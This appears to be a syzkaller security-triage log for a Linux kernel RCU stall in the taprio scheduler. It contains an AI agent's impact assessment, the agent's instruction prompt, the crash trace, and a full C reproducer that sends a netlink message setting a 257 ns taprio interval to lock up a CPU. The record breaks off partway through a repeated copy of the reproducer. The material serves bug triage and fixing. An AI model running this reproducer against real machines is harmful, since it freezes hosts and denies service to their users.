| 0/0 |
2026/05/24 12:38 |
flow |
assessment-security |
53m
Results: map[DenialOfService:true Explanation:**Analysis of the Bug**
The bug is an RCU stall (CPU lockup) in the `taprio` packet scheduler
(`net/sched/sch_taprio.c`).
**Root Cause:**
The `taprio` qdisc uses an hrtimer (`advance_timer`) to advance through its
schedule entries. When the timer fires, the `advance_sched()` function
calculates the next expiration time by adding the `interval` of the next
schedule entry to the current expiration time.
The kernel attempts to validate that the `interval` is large enough to transmit
at least one minimum-sized Ethernet frame (`ETH_ZLEN`), which depends on the
link speed of the network interface. However, on high-speed virtual interfaces
like `veth` (which defaults to 10,000 Mbps), this minimum duration
(`min_duration`) evaluates to a very small value (e.g., 48 nanoseconds).
An attacker can configure a taprio schedule with an `interval` slightly above
this minimum (e.g., 257 ns). Because 257 ns is significantly smaller than the
time it takes the CPU to execute `advance_sched()` and process the timer
interrupt (which typically takes ~500 ns or more), the timer's expiration time
advances slower than real time.
When the hrtimer subsystem processes expired timers in `__hrtimer_run_queues()`,
it loops over all expired timers until their expiration time is in the future
relative to a fixed `basenow` timestamp. Since `advance_sched()` only advances
the timer by 257 ns per iteration, it takes millions of iterations to catch up
to `basenow`. By the time the loop finishes, real time has advanced even
further, causing the timer hardware to immediately fire another interrupt and
repeat the process with an even larger gap. This permanently traps the CPU in
softirq context, leading to an RCU stall and a complete system lockup.
**Security Impact:**
* **Exploitable:** No. This is purely a logic error resulting in an infinite
loop. It does not cause memory corruption, out-of-bounds accesses, or
use-after-free conditions, so it cannot be exploited for privilege escalation or
arbitrary code execution.
* **Denial Of Service:** Yes. The bug permanently hogs a CPU core in an
interrupt context, leading to RCU stalls, watchdog panics, and a complete system
freeze.
* **Accessible From User Namespaces:** Yes. Configuring a qdisc requires the
`CAP_NET_ADMIN` capability. An unprivileged user can obtain this capability by
creating a new user namespace and a new network namespace. Inside this isolated
environment, they can create a `veth` interface and attach the malicious taprio
qdisc to it, crashing the host system.
* **Accessible From Unprivileged Processes:** No. Without user namespaces, a
standard unprivileged process does not have the required `CAP_NET_ADMIN`
capability to configure network schedulers. Exploitable:false FilesystemTrigger:false NetworkTrigger:false PeripheralTrigger:false RemoteTrigger:false Unprivileged:false UserNamespace:true VMGuestTrigger:false VMHostTrigger:false]
|
| 1/1 |
2026/05/24 12:38 |
action |
syz-repro-to-c-repro |
0m
Results: map[SimplifiedCRepro:// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#define BITMASK(bf_off,bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type,htobe,addr,val,bf_off,bf_len) *(type*)(addr) = htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
uint64_t r[3] = {0xffffffffffffffff, 0x0, 0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {}
// socket arguments: [
// domain: socket_domain = 0x11 (8 bytes)
// type: socket_type = 0x800000003 (8 bytes)
// proto: int32 = 0x0 (4 bytes)
// ]
// returns sock
res = syscall(__NR_socket, /*domain=AF_PACKET*/0x11ul, /*type=SOCK_RAW|0x800000000*/0x800000003ul, /*proto=*/0);
if (res != -1)
r[0] = res;
// ioctl$ifreq_SIOCGIFINDEX_team arguments: [
// fd: sock (resource)
// cmd: const = 0x8933 (4 bytes)
// arg: ptr[out, ifreq_dev_t["team0", ifindex_team]] {
// ifreq_dev_t["team0", ifindex_team] {
// ifr_ifrn: buffer: {74 65 61 6d 30 00 00 00 00 00 00 00 00 00 00 00} (length 0x10)
// elem: ifindex_team (resource)
// pad = 0x0 (20 bytes)
// }
// }
// ]
memcpy((void*)0x200000000500, "team0\000\000\000\000\000\000\000\000\000\000\000", 16);
res = syscall(__NR_ioctl, /*fd=*/r[0], /*cmd=*/0x8933, /*arg=*/0x200000000500ul);
if (res != -1)
r[1] = *(uint32_t*)0x200000000510;
// socket$netlink arguments: [
// domain: const = 0x10 (8 bytes)
// type: const = 0x3 (8 bytes)
// proto: netlink_proto = 0x0 (4 bytes)
// ]
// returns sock_netlink
res = syscall(__NR_socket, /*domain=*/0x10ul, /*type=*/3ul, /*proto=*/0);
if (res != -1)
r[2] = res;
// sendmsg$nl_route_sched arguments: [
// fd: sock_nl_route (resource)
// msg: ptr[in, msghdr_netlink[netlink_msg_route_sched]] {
// msghdr_netlink[netlink_msg_route_sched] {
// addr: nil
// addrlen: len = 0x0 (4 bytes)
// pad = 0x0 (4 bytes)
// vec: ptr[in, iovec[in, netlink_msg_route_sched]] {
// iovec[in, netlink_msg_route_sched] {
// addr: ptr[in, netlink_msg_route_sched] {
// union netlink_msg_route_sched {
// newqdisc: netlink_msg_t[const[RTM_NEWQDISC, int16], tcmsg[AF_UNSPEC], rtm_tca_policy] {
// len: len = 0xac (4 bytes)
// type: const = 0x24 (2 bytes)
// flags: netlink_msg_flags = 0xf0b (2 bytes)
// seq: int32 = 0x0 (4 bytes)
// pid: int32 = 0x0 (4 bytes)
// payload: tcmsg[AF_UNSPEC] {
// family: const = 0x0 (1 bytes)
// tcm__pad1: const = 0x0 (1 bytes)
// tcm__pad2: const = 0x12 (2 bytes)
// ifindex: ifindex (resource)
// tcm_handle: tcm_handle {
// minor: tcm_handle_offsets = 0x0 (2 bytes)
// major: tcm_handle_offsets = 0xfff2 (2 bytes)
// }
// tcm_parent: tcm_handle {
// minor: tcm_handle_offsets = 0xffff (2 bytes)
// major: tcm_handle_offsets = 0xffff (2 bytes)
// }
// tcm_info: tcm_handle {
// minor: tcm_handle_offsets = 0x0 (2 bytes)
// major: tcm_handle_offsets = 0x0 (2 bytes)
// }
// }
// attrs: array[rtm_tca_policy] {
// union rtm_tca_policy {
// qdisc_kind_options: union qdisc_kind_options {
// q_taprio: tca_kind_options_t["taprio", array[taprio_policy]] {
// TCA_KIND: nlattr_t[const[TCA_KIND, int16], string["taprio"]] {
// nla_len: offsetof = 0xb (2 bytes)
// nla_type: const = 0x1 (2 bytes)
// payload: buffer: {74 61 70 72 69 6f 00} (length 0x7)
// size: buffer: {} (length 0x0)
// pad = 0x0 (1 bytes)
// }
// TCA_OPTIONS: nlattr_t[const[TCA_OPTIONS, int16], array[taprio_policy]] {
// nla_len: offsetof = 0x7c (2 bytes)
// nla_type: const = 0x2 (2 bytes)
// payload: array[taprio_policy] {
// union taprio_policy {
// TCA_TAPRIO_ATTR_PRIOMAP: nlattr_t[const[TCA_TAPRIO_ATTR_PRIOMAP, int16], tc_mqprio_qopt] {
// nla_len: offsetof = 0x56 (2 bytes)
// nla_type: const = 0x1 (2 bytes)
// payload: tc_mqprio_qopt {
// num_tc: int8 = 0x2 (1 bytes)
// prio_tc_map: array[int8] {
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x1 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// int8 = 0x0 (1 bytes)
// }
// hw: int8 = 0x0 (1 bytes)
// count: array[int16] {
// int16 = 0x8 (2 bytes)
// int16 = 0x4 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x9 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x3 (2 bytes)
// int16 = 0x400 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// }
// offset: array[int16] {
// int16 = 0x0 (2 bytes)
// int16 = 0x8 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0xff (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// int16 = 0x0 (2 bytes)
// }
// }
// size: buffer: {} (length 0x0)
// pad = 0x0 (2 bytes)
// }
// }
// union taprio_policy {
// TCA_TAPRIO_ATTR_SCHED_CLOCKID: nlattr_t[const[TCA_TAPRIO_ATTR_SCHED_CLOCKID, int16], int32] {
// nla_len: offsetof = 0x8 (2 bytes)
// nla_type: const = 0x5 (2 bytes)
// payload: int32 = 0x0 (4 bytes)
// size: buffer: {} (length 0x0)
// }
// }
// union taprio_policy {
// TCA_TAPRIO_ATTR_SCHED_ENTRY_LIST: nlattr_tt[const[TCA_TAPRIO_ATTR_SCHED_ENTRY_LIST, int16:14], 0, 1, array[nlnest[TCA_TAPRIO_SCHED_ENTRY, array[entry_policy$taprio]]]] {
// nla_len: offsetof = 0x18 (2 bytes)
// nla_type: const = 0x2 (1 bytes)
// NLA_F_NET_BYTEORDER: const = 0x0 (0 bytes)
// NLA_F_NESTED: const = 0x1 (1 bytes)
// payload: array[nlattr_tt[const[TCA_TAPRIO_SCHED_ENTRY, int16:14], 0, 1, array[entry_policy$taprio]]] {
// nlattr_tt[const[TCA_TAPRIO_SCHED_ENTRY, int16:14], 0, 1, array[entry_policy$taprio]] {
// nla_len: offsetof = 0x14 (2 bytes)
// nla_type: const = 0x1 (1 bytes)
// NLA_F_NET_BYTEORDER: const = 0x0 (0 bytes)
// NLA_F_NESTED: const = 0x1 (1 bytes)
// payload: array[entry_policy$taprio] {
// union entry_policy$taprio {
// TCA_TAPRIO_SCHED_ENTRY_INTERVAL: nlattr_t[const[TCA_TAPRIO_SCHED_ENTRY_INTERVAL, int16], int32] {
// nla_len: offsetof = 0x8 (2 bytes)
// nla_type: const = 0x4 (2 bytes)
// payload: int32 = 0x4000000 (4 bytes)
// size: buffer: {} (length 0x0)
// }
// }
// union entry_policy$taprio {
// TCA_TAPRIO_SCHED_ENTRY_INTERVAL: nlattr_t[const[TCA_TAPRIO_SCHED_ENTRY_INTERVAL, int16], int32] {
// nla_len: offsetof = 0x8 (2 bytes)
// nla_type: const = 0x4 (2 bytes)
// payload: int32 = 0x101 (4 bytes)
// size: buffer: {} (length 0x0)
// }
// }
// }
// size: buffer: {} (length 0x0)
// }
// }
// size: buffer: {} (length 0x0)
// }
// }
// }
// size: buffer: {} (length 0x0)
// }
// }
// }
// }
// }
// }
// }
// }
// len: len = 0xac (8 bytes)
// }
// }
// vlen: const = 0x1 (8 bytes)
// ctrl: const = 0x0 (8 bytes)
// ctrllen: const = 0x0 (8 bytes)
// f: send_flags = 0x0 (4 bytes)
// pad = 0x0 (4 bytes)
// }
// }
// f: send_flags = 0x0 (8 bytes)
// ]
*(uint64_t*)0x2000000007c0 = 0;
*(uint32_t*)0x2000000007c8 = 0;
*(uint64_t*)0x2000000007d0 = 0x200000000780;
*(uint64_t*)0x200000000780 = 0x200000000800;
*(uint32_t*)0x200000000800 = 0xac;
*(uint16_t*)0x200000000804 = 0x24;
*(uint16_t*)0x200000000806 = 0xf0b;
*(uint32_t*)0x200000000808 = 0;
*(uint32_t*)0x20000000080c = 0;
*(uint8_t*)0x200000000810 = 0;
*(uint8_t*)0x200000000811 = 0;
*(uint16_t*)0x200000000812 = 0x12;
*(uint32_t*)0x200000000814 = r[1];
*(uint16_t*)0x200000000818 = 0;
*(uint16_t*)0x20000000081a = 0xfff2;
*(uint16_t*)0x20000000081c = -1;
*(uint16_t*)0x20000000081e = -1;
*(uint16_t*)0x200000000820 = 0;
*(uint16_t*)0x200000000822 = 0;
*(uint16_t*)0x200000000824 = 0xb;
*(uint16_t*)0x200000000826 = 1;
memcpy((void*)0x200000000828, "taprio\000", 7);
*(uint16_t*)0x200000000830 = 0x7c;
*(uint16_t*)0x200000000832 = 2;
*(uint16_t*)0x200000000834 = 0x56;
*(uint16_t*)0x200000000836 = 1;
*(uint8_t*)0x200000000838 = 2;
*(uint8_t*)0x200000000839 = 0;
*(uint8_t*)0x20000000083a = 0;
*(uint8_t*)0x20000000083b = 0;
*(uint8_t*)0x20000000083c = 0;
*(uint8_t*)0x20000000083d = 1;
*(uint8_t*)0x20000000083e = 0;
*(uint8_t*)0x20000000083f = 0;
*(uint8_t*)0x200000000840 = 0;
*(uint8_t*)0x200000000841 = 0;
*(uint8_t*)0x200000000842 = 0;
*(uint8_t*)0x200000000843 = 0;
*(uint8_t*)0x200000000844 = 0;
*(uint8_t*)0x200000000845 = 0;
*(uint8_t*)0x200000000846 = 0;
*(uint8_t*)0x200000000847 = 0;
*(uint8_t*)0x200000000848 = 0;
*(uint8_t*)0x200000000849 = 0;
*(uint16_t*)0x20000000084a = 8;
*(uint16_t*)0x20000000084c = 4;
*(uint16_t*)0x20000000084e = 0;
*(uint16_t*)0x200000000850 = 9;
*(uint16_t*)0x200000000852 = 0;
*(uint16_t*)0x200000000854 = 0;
*(uint16_t*)0x200000000856 = 0;
*(uint16_t*)0x200000000858 = 0;
*(uint16_t*)0x20000000085a = 0;
*(uint16_t*)0x20000000085c = 0;
*(uint16_t*)0x20000000085e = 0;
*(uint16_t*)0x200000000860 = 3;
*(uint16_t*)0x200000000862 = 0x400;
*(uint16_t*)0x200000000864 = 0;
*(uint16_t*)0x200000000866 = 0;
*(uint16_t*)0x200000000868 = 0;
*(uint16_t*)0x20000000086a = 0;
*(uint16_t*)0x20000000086c = 8;
*(uint16_t*)0x20000000086e = 0;
*(uint16_t*)0x200000000870 = 0;
*(uint16_t*)0x200000000872 = 0;
*(uint16_t*)0x200000000874 = 0;
*(uint16_t*)0x200000000876 = 0;
*(uint16_t*)0x200000000878 = 0;
*(uint16_t*)0x20000000087a = 0xff;
*(uint16_t*)0x20000000087c = 0;
*(uint16_t*)0x20000000087e = 0;
*(uint16_t*)0x200000000880 = 0;
*(uint16_t*)0x200000000882 = 0;
*(uint16_t*)0x200000000884 = 0;
*(uint16_t*)0x200000000886 = 0;
*(uint16_t*)0x200000000888 = 0;
*(uint16_t*)0x20000000088c = 8;
*(uint16_t*)0x20000000088e = 5;
*(uint32_t*)0x200000000890 = 0;
*(uint16_t*)0x200000000894 = 0x18;
STORE_BY_BITMASK(uint16_t, , 0x200000000896, 2, 0, 14);
STORE_BY_BITMASK(uint16_t, , 0x200000000897, 0, 6, 1);
STORE_BY_BITMASK(uint16_t, , 0x200000000897, 1, 7, 1);
*(uint16_t*)0x200000000898 = 0x14;
STORE_BY_BITMASK(uint16_t, , 0x20000000089a, 1, 0, 14);
STORE_BY_BITMASK(uint16_t, , 0x20000000089b, 0, 6, 1);
STORE_BY_BITMASK(uint16_t, , 0x20000000089b, 1, 7, 1);
*(uint16_t*)0x20000000089c = 8;
*(uint16_t*)0x20000000089e = 4;
*(uint32_t*)0x2000000008a0 = 0x4000000;
*(uint16_t*)0x2000000008a4 = 8;
*(uint16_t*)0x2000000008a6 = 4;
*(uint32_t*)0x2000000008a8 = 0x101;
*(uint64_t*)0x200000000788 = 0xac;
*(uint64_t*)0x2000000007d8 = 1;
*(uint64_t*)0x2000000007e0 = 0;
*(uint64_t*)0x2000000007e8 = 0;
*(uint32_t*)0x2000000007f0 = 0;
syscall(__NR_sendmsg, /*fd=*/r[2], /*msg=*/0x2000000007c0ul, /*f=*/0ul);
return 0;
}
]
|
| 2/1 |
2026/05/24 12:38 |
action |
kernel-checkouter |
1m
Results: map[KernelSrc:/app/workdir/cache/src/00943b4a446ebe3139ed88b48da19ad1df5ca2f3]
|
| 3/1 |
2026/05/24 12:40 |
action |
kernel-builder |
26m
Results: map[KernelObj:/app/workdir/cache/build/2491fd7b5d2e10ed02394372e465035aa5e6735a]
|
| 4/1 |
2026/05/24 13:07 |
action |
codesearch-prepare |
18m
Results: map[Index:codesearch-index]
|
| 5/1 |
2026/05/24 13:25 |
agent |
expert |
7m
Model:
Results: map[DenialOfService:true Exploitable:false FilesystemTrigger:false NetworkTrigger:false PeripheralTrigger:false RemoteTrigger:false Unprivileged:false UserNamespace:true VMGuestTrigger:false VMHostTrigger:false]
Instruction:
You are an experienced Linux kernel security engineer. Your task is to analyze given kernel bug report
and determine its security impact based on the following dimensions.
Use the provided tools to examine the source code, check for capability checks (e.g., capable(), ns_capable()),
and understand the nature of the bug. Analyze the given kernel build and configuration.
You can check the kernel config by grepping ".config" file; you can check kernel cmdline by greeping
".config" file for "CONFIG_CMDLINE=". Assume sysctl parameters have default values.
But analyze for the corresponding production build w/o debugging tools enabled (like KASAN, KMSAN, UBSAN).
Try different strategies when analyzing the bug:
- think of ways in which the vulnerable code is unreachable
- or the other way around: try to come up with different ideas of how an unprivileged user can reach the bug
If still unsure err on the side of the bug being non-exploitable/not-accessible.
In the final reply, provide a reasoning for your assessment.
Analysis dimensions:
* Exploitable:
Determine if the bug can result in memory corruption or elevated privileges.
Memory safety issues are almost always exploitable (KASAN or UBSAN reports for use-after-free, out-of-bounds;
refcounting issues, corrupted lists, etc). When kernel is crashing on a completly wild pointer access
(e.g. user-space address, or non-canonical address, but not on NULL or address corresponding to KASAN shadow
for NULL address), including both data accesses and control tranfers, that's also usually implies possibility
of exploitation. Such reports usually say "unable to handle kernel paging request".
Uses of uninitialized values detected by KMSAN may be exploitable b/c attacker frequently can affect uninit
values with spraying techniques. However, for these exploitabability depends on how exactly the uninit value
is used in the code, and what it affects.
Think of what happens after the bug is triggered. Some bugs cause kernel panic and halt execution,
they are harder to exploit. For example, BUG reports halts the kernel. However, WARNING reports don't halt
execution in production builds. Debug bug detection tools (like KASAN, KMSAN, KCSAN, UBSAN) are also not enabled
in production builds, so attacker can freely exploit these bugs w/o being detected by these tools.
If you see an integer overflow, think how the overflowed value used later (if it's used as allocation size,
or an array index). If you see an out-of-bounds read, think if it's followed by an out-of-bounds write as well.
Some KCSAN data-races may be exploitable by skilled attackers as well. Think what data structures got corrupted
as the result of data races and how. However, note that kernel has lots of "benign" data races that don't lead
to any runtime misbehavior at all.
* Denial Of Service:
Determine if the bug can result in denial-of-service. Most bugs can, since they cause system crash,
hangs, deadlocks, or resource leaks. This is mostly applicable to WARNING bugs that won't cause system crash
in production. For these think what will be consequences of the violation of the kernel assumptions flagged
by the WARNING. In some cases the unexpected condition is also properly handled by the normal control flow
(e.g. with "if (WARN_ON(...))"), these won't cause denial-of-service. If the condition is not handled,
then it may or may not cause denial-of-service.
* Accessible From Unprivileged Processes:
Determine if the bug can be reached from a typical (non-root) user process that does NOT have any special capabilities
(like CAP_SYS_ADMIN, CAP_NET_ADMIN, CAP_NET_RAW, CAP_PERFMON) or access to device nodes restricted to root.
Assume that unprivileged_bpf_disabled=1, that is eBPF loading is not accessible. However, cBPF (classical BPF)
is still accessible to non-root processes.
Assume that user namespaces are not accessible, that is, the process cannot get the mentioned capabilities even
within a new user namespace (checked by ns_capable() function in the kernel sources).
* Accessible From User Namespaces:
Determine if the bug can be reached within a user-namespace where the process has all capabilities
(including CAP_SYS_ADMIN, CAP_NET_ADMIN, CAP_NET_RAW, CAP_PERFMON). Such capabilities are checked with ns_capable()
function in the kernel sources.
* VM Guest Trigger:
Determine if the bug can be triggered from the context of a typical KVM guest (e.g., set up by a QEMU VMM).
Consider accesses to standard Linux host paravirtualized features (virtio-blk, virtio-net, etc.),
and handling of VM exits in the KVM code.
* VM Host Trigger in The Confidetial Computing Context:
Determine if the bug can be triggered in a confidential computing guest kernel from the context of a KVM host.
Consider access to standard Linux guest paravirtualized features (virtio-blk, virtio-net, etc.).
* Ethernet Network Trigger:
Determine if the bug can be triggered by processing ingress network Ethernet traffic, either directly (network stack)
or via drivers exposed to network data.
* Other Remote Trigger:
Determine if the bug can be triggered by processing remote traffic other than Ethernet (Wifi, Bluetooth, NFC, etc).
* Peripheral Trigger:
Determine if the bug can be triggered via an untrusted peripheral device that can be physically plugged
into a system, such as a USB device or a niche hardware driver handling external hardware inputs.
This is particularly important for mobile and desktop environments where users can plug in unknown devices.
* Malicious Filesystem Trigger:
Determine if the bug can be triggered by the kernel mounting and parsing a malicious filesystem image.
This is highly critical for Desktop and Mobile environments where external media or downloaded images
might be auto-mounted.
Don't make assumptions about the kernel source code (it may be different from what you assume it is).
Extensively use the provided code access tools (codesearch-*, git-*, grepper, etc)
to examine the actual source code, and confirm any assumptions.
Prefer calling several tools at the same time to save round-trips.
Use set-results tool to provide results of the analysis.
It must be called exactly once before the final reply.
Ignore results of this tool.
Prompt:
The kernel bug report is:
rcu: INFO: rcu_preempt detected stalls on CPUs/tasks:
rcu: 1-...!: (1 GPs behind) idle=83dc/1/0x4000000000000000 softirq=15551/15553 fqs=1
rcu: (detected by 0, t=10502 jiffies, g=11393, q=295 ncpus=2)
Sending NMI from CPU 0 to CPUs 1:
NMI backtrace for cpu 1
CPU: 1 UID: 0 PID: 5951 Comm: syz-executor Not tainted syzkaller #0 PREEMPT(full)
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025
RIP: 0010:kasan_check_range+0xb/0x2c0 mm/kasan/generic.c:199
Code: b8 ea ff ff ff eb e1 cc cc cc cc cc cc cc cc 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f 1f 40 d6 55 41 57 41 56 41 55 <41> 54 53 b0 01 48 85 f6 0f 84 ba 01 00 00 4c 8d 04 37 49 39 f8 0f
RSP: 0018:ffffc90000a08c00 EFLAGS: 00000046
RAX: 0000000000000000 RBX: ffff8880757e92e8 RCX: ffffffff819dfacd
RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffff8880757e92e8
RBP: ffff888031ca7950 R08: ffff888031ca7887 R09: 1ffff11006394f10
R10: dffffc0000000000 R11: ffffed1006394f11 R12: dffffc0000000000
R13: ffff8880757e9000 R14: ffff8880757e92ec R15: ffff888031ca7400
FS: 00005555652af500(0000) GS:ffff88812623c000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000500 CR3: 0000000030c1e000 CR4: 00000000003526f0
Call Trace:
<IRQ>
instrument_atomic_read include/linux/instrumented.h:68 [inline]
atomic_read include/linux/atomic/atomic-instrumented.h:32 [inline]
queued_spin_is_locked include/asm-generic/qspinlock.h:57 [inline]
debug_spin_unlock kernel/locking/spinlock_debug.c:101 [inline]
do_raw_spin_unlock+0x4d/0x240 kernel/locking/spinlock_debug.c:141
__raw_spin_unlock include/linux/spinlock_api_smp.h:142 [inline]
_raw_spin_unlock+0x1e/0x50 kernel/locking/spinlock.c:186
spin_unlock include/linux/spinlock.h:391 [inline]
advance_sched+0x99f/0xc90 net/sched/sch_taprio.c:986
__run_hrtimer kernel/time/hrtimer.c:1777 [inline]
__hrtimer_run_queues+0x52c/0xc60 kernel/time/hrtimer.c:1841
hrtimer_interrupt+0x45b/0xaa0 kernel/time/hrtimer.c:1903
local_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1041 [inline]
__sysvec_apic_timer_interrupt+0x10b/0x410 arch/x86/kernel/apic/apic.c:1058
instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1052 [inline]
sysvec_apic_timer_interrupt+0xa1/0xc0 arch/x86/kernel/apic/apic.c:1052
</IRQ>
<TASK>
asm_sysvec_apic_timer_interrupt+0x1a/0x20 arch/x86/include/asm/idtentry.h:697
RIP: 0010:queue_delayed_work_on+0x201/0x280 kernel/workqueue.c:2566
Code: 4d 85 e4 75 16 e8 2f 0c 36 00 eb 15 e8 28 0c 36 00 e8 c3 49 bc 09 4d 85 e4 74 ea e8 19 0c 36 00 fb 48 c7 44 24 40 0e 36 e0 45 <4b> c7 04 2f 00 00 00 00 66 43 c7 44 2f 09 00 00 43 c6 44 2f 0b 00
RSP: 0018:ffffc90004f1f420 EFLAGS: 00000293
RAX: ffffffff8189f857 RBX: ffff88807cd1ae01 RCX: ffff888029613c80
RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000
RBP: ffffc90004f1f510 R08: ffffffff8f7cdc77 R09: 1ffffffff1ef9b8e
R10: dffffc0000000000 R11: fffffbfff1ef9b8f R12: 0000000000000200
R13: dffffc0000000000 R14: 0000000000000000 R15: 1ffff920009e3e8c
queue_delayed_work include/linux/workqueue.h:684 [inline]
__inet_insert_ifa+0x9e6/0xbf0 net/ipv4/devinet.c:560
inet_rtm_newaddr+0xf3a/0x18b0 net/ipv4/devinet.c:1001
rtnetlink_rcv_msg+0x7cf/0xb70 net/core/rtnetlink.c:6951
netlink_rcv_skb+0x208/0x470 net/netlink/af_netlink.c:2552
netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]
netlink_unicast+0x82f/0x9e0 net/netlink/af_netlink.c:1346
netlink_sendmsg+0x805/0xb30 net/netlink/af_netlink.c:1896
sock_sendmsg_nosec net/socket.c:727 [inline]
__sock_sendmsg+0x21c/0x270 net/socket.c:742
__sys_sendto+0x3bd/0x520 net/socket.c:2244
__do_sys_sendto net/socket.c:2251 [inline]
__se_sys_sendto net/socket.c:2247 [inline]
__x64_sys_sendto+0xde/0x100 net/socket.c:2247
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f6a0039155c
Code: 2a 5f 02 00 44 8b 4c 24 2c 4c 8b 44 24 20 89 c5 44 8b 54 24 28 48 8b 54 24 18 b8 2c 00 00 00 48 8b 74 24 10 8b 7c 24 08 0f 05 <48> 3d 00 f0 ff ff 77 34 89 ef 48 89 44 24 08 e8 70 5f 02 00 48 8b
RSP: 002b:00007ffe06e21570 EFLAGS: 00000293 ORIG_RAX: 000000000000002c
RAX: ffffffffffffffda RBX: 00007f6a01114620 RCX: 00007f6a0039155c
RDX: 0000000000000028 RSI: 00007f6a01114670 RDI: 0000000000000003
RBP: 0000000000000000 R08: 00007ffe06e215c4 R09: 000000000000000c
R10: 0000000000000000 R11: 0000000000000293 R12: 0000000000000003
R13: 0000000000000000 R14: 00007f6a01114670 R15: 0000000000000000
</TASK>
rcu: rcu_preempt kthread timer wakeup didn't happen for 10499 jiffies! g11393 f0x0 RCU_GP_WAIT_FQS(5) ->state=0x402
rcu: Possible timer handling issue on cpu=1 timer-softirq=5906
rcu: rcu_preempt kthread starved for 10500 jiffies! g11393 f0x0 RCU_GP_WAIT_FQS(5) ->state=0x402 ->cpu=1
rcu: Unless rcu_preempt kthread gets sufficient CPU time, OOM is now expected behavior.
rcu: RCU grace-period kthread stack dump:
task:rcu_preempt state:I stack:27912 pid:16 tgid:16 ppid:2 task_flags:0x208040 flags:0x00080000
Call Trace:
<TASK>
context_switch kernel/sched/core.c:5325 [inline]
__schedule+0x1798/0x4cc0 kernel/sched/core.c:6929
__schedule_loop kernel/sched/core.c:7011 [inline]
schedule+0x165/0x360 kernel/sched/core.c:7026
schedule_timeout+0x12b/0x270 kernel/time/sleep_timeout.c:99
rcu_gp_fqs_loop+0x301/0x1540 kernel/rcu/tree.c:2083
rcu_gp_kthread+0x99/0x390 kernel/rcu/tree.c:2285
kthread+0x711/0x8a0 kernel/kthread.c:463
ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158
ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245
</TASK>
It is reproducible with the followint program.
Keep in mind that it may lack the precise threading, sandboxing, and some arguments of a working reproducer.
But it should give an idea of the involved syscalls.
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#define BITMASK(bf_off,bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type,htobe,addr,val,bf_off,bf_len) *(type*)(addr) = htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
uint64_t r[3] = {0xffffffffffffffff, 0x0, 0xffffffffffffffff};
int main(void)
{
